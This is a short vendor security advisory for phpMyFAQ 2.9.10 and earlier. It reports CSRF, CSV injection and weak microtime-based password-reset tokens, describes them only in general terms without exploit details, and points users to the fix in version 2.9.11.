Security Advisory 2018-09-02

Multiple vulnerabilities in phpMyFAQ

Issued on:
2018-09-02
Software:
phpMyFAQ <= 2.9.10
Risk:
Medium
Platforms:
all

The phpMyFAQ Team has learned of some security issues that have been discovered in phpMyFAQ 2.9.10 and earlier. phpMyFAQ contains cross-site request forgery, a CSV Injection and an insecure usage of microtime for password-reset tokens.

Description

phpMyFAQ does not implement sufficient checks to avoid CSRF and CSV injection for the reports generated in the admin backend. For the CSRF and CSV injection you need administrator privileges to be executed. We also use microtime to generate the tokens of new passwords.

Solution

The phpMyFAQ Team has released the new phpMyFAQ versions 2.9.11 which fix the vulnerabilities. All users of affected phpMyFAQ versions are encouraged to upgrade as soon as possible to this latest version.

Workaround

There's no workaround except installing phpMyFAQ 2.9.11.

References

Thanks

The phpMyFAQ teams would like to thank Zeel Chavda for the CSRF and CSV injection. We want to thank all for the responsible disclosure of these vulnerabilities.

Back to the security advisories overview